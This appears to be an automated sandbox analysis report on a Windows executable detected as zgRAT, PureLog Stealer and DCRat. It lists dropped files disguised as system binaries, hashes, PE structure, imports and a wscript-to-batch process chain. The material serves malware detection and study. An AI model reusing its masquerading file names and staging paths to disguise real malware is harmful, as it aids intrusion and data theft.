                                                          File Type:ASCII text, with very long lines (431), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):431
                                                          Entropy (8bit):5.883473171699749
                                                          Encrypted:false
                                                          SSDEEP:12:0y4ArDq/ac/BlhQAham5ooTAIfWRyu1oReHrm:2AHqCc/jBAm5ookQWRuSm
                                                          MD5:F9C4BB457C064F908A12F50601E18D1C
                                                          SHA1:D11D3CBCFFFF7DE06FC5DF790B447E512CA7B6B6
                                                          SHA-256:DE4240BDE094A37E7A680E04D6BE7CE7D779455343F11EDC706F5AE36CED99D6
                                                          SHA-512:65C5CE25D6AD48A1C66019B6E326B19C565BD4D8091AC70229B610F5AB6815CD992D1F2FD803421E83C88A95699033592EACADE69B95CE5CFAFA650221CAD01B
                                                          Malicious:false
                                                          Preview:fTct1R4A78kEa3o7YiKspbebQnTG9Cc3N7JICKd1MGsa8hcVqLhSemuDzAdO7yB5gq1cug5OESfjsDdsK8axfJZkMFTBrP4YFx3Rq9kKQTOMGLVvhuD9XNZWRQQpM4hyXHe5KLCLYQhM5MeBuid6M5A1Xh9at57WvZy8rZlVs1kHqNbFvO5oakmcHmhnMlbcSKagXfUU7IOUU2LKG4oeAS6LxV1E28JGaIyfx4rP4krRVRIPaXgR66cAOOtCoPb99H4MDqWLMZkZkozfNlofb1JdpyQiKpkpJsSNW6LuAVFhWDZkYNzCk6hI8bgPZxAhy5P2VmJQa4fFwlGmYqK70iENKKP4a5UMUhtaxhOwEimqbcWWU41tnDrQ1CrLWO0ejSvO2pz0bX2R5Ywsy3jgEliQ0dju0Da0sHGIrHeoEARQLaU

                                                          C:\Windows\SchCache\RuntimeBroker.exe

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\SchCache\RuntimeBroker.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\SchCache\RuntimeBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9

                                                          C:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.994703751663742
                                                          Encrypted:false
                                                          SSDEEP:48:6upDPtKM7Jt8Bs3FJsdcV4MKe27hx0NPvqBHmOulajfqXSfbNtm:JPZPc+Vx9M3qvkAcjRzNt
                                                          MD5:8055E5D0094B3F48EBFB630261948B0D
                                                          SHA1:6CEE8B301B909FB12CF14FC544E08DDCB26EF983
                                                          SHA-256:8BC6B0FC155C64A919329CA9A453644C59F6D377DE99CD556C1C51208EF66543
                                                          SHA-512:2B31FD36392514E67328AAD9A2E3B8029EC2056E65F1A3ED68C9D1CB1A1B0F219C313AD9C3B16FAC2943A421842A087D168D65A202182ACEABB0D75F587CD25E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..\.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.,.......#GUID...<... ...#Blob...........WU........%3................................................................

                                                          C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9

                                                          C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\b1829d2998bf98

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):198
                                                          Entropy (8bit):5.7053545251893185
                                                          Encrypted:false
                                                          SSDEEP:6:NUQG3EQ9VHmY1f4dd1o3O9JqhM50ndeHbiG2RBAj0Ux:FK9Vd1fAhMM2dybiG2sf
                                                          MD5:D164632CA511D0AD5EC7D57E7E0CB025
                                                          SHA1:73465130A5B106869D672CB2E385A1C97714406B
                                                          SHA-256:DE03839196DFAC63B001724481E42E944247EE525816846034C9A1C7EFD075A2
                                                          SHA-512:14A7E85412A0938A88FE9089359DF94BB008C9BDAACE8396BB4C77605A1FC1A60BC5DD521631D0AD5165ED4DABDE091B2522BE010EA27CE9566133102B45ADE0
                                                          Malicious:false
                                                          Preview:IoM1RJ6k8mqJmcbzjrYp6fkOWM4V419XKdpIWvhg9dUW4Lasf0dcRgOmD7eFPlpHnT9IxTdxJ1qdLOULvLzEXgGnOCEYRcQYyMslMR4MXpSZ0vaznSTDvltGNV4uOEgqkRo8gt9eRnrsOqxclPv8JNnMdmX0XJ7SJlyiGcS4TzwH3A2gicJ9TihXobe4VJHHqZjm2O

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.793964247365998
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXXtQvj+fcRvpG6LyXKvj:Vx993DEUsC+Um8
                                                          MD5:81A882556A63121621504871B31AE370
                                                          SHA1:050E8B5FA57D2D9EB76ADB27CE96BD77F2B62725
                                                          SHA-256:43AD74B6616F6382792E6791E5F15B7B20D26A1CC9FE0DB2CA8D528B2C16B97B
                                                          SHA-512:0A19A7B6DC394B31D19D2119EF2196AF4B0DD69FA34488BB923BA0D3779A0D856590C870254D5641BFCCC026F13ACFC46D41A1DF65B24C7A3BC49444ECE709C1
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 10/01/2025 01:19:05..01:19:05, error: 0x80072746.01:19:10, error: 0x80072746.

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):1.6270888613256027
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:7aHY4r6vXR.exe
                                                          File size:14'707'581 bytes
                                                          MD5:ccd01051f9e8bf3301b3bdd406f0bc24
                                                          SHA1:4e9f71953bd348261e9342f7dd230f274d808e4a
                                                          SHA256:4fa025632546c9a5c346cde16c86c5d129d8381ace82e1a7d59ca865f948c533
                                                          SHA512:93839aad8a1c533c48c9ef9cfa87c6b5e3abefe0054be20d7a0f1bd8affa2e1787b529ed4fc0371a6874ba7670b50270b554add56436540d4b197d14337455de
                                                          SSDEEP:24576:2TbBv5rUyXVnAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/n:IBJAhMsccEmgIT1sJjdIvqr4tI5E
                                                          TLSH:58E6CF0675C68E33C2741A354667123E92A0E7253622EB0F761F2497A807BF58F762F3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                          File Icon

                                                          Icon Hash:1515d4d4442f2d2d

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F383923251Bh
                                                          jmp 00007F3839231E2Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007F3839224C77h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007F38392352BFh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007F3839231FBCh
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007F3839231579h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F3839224BF2h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F3839234D79h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F3839231F38h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F3839234D5Ch
                                                          int3
                                                          jmp 00007F38392367F7h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                          PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                          RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                          RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                          RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                          RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                          RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                          RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                          RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                          RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                          RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                          RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                          RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                          RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                          RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                          RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                          RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                          RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                          RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                          RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                          RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                          RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                          RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                          RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                          RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                          RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                          RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          No network behavior found

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:23:42:06
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\7aHY4r6vXR.exe"
                                                          Imagebase:0xbd0000
                                                          File size:14'707'581 bytes
                                                          MD5 hash:CCD01051F9E8BF3301B3BDD406F0BC24
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:23:42:06
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe"
                                                          Imagebase:0x910000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:23:42:11
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:23:42:12
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:23:42:12
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ChainBroker/bridgeServerFontSavesMonitor.exe"
                                                          Imagebase:0xca0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
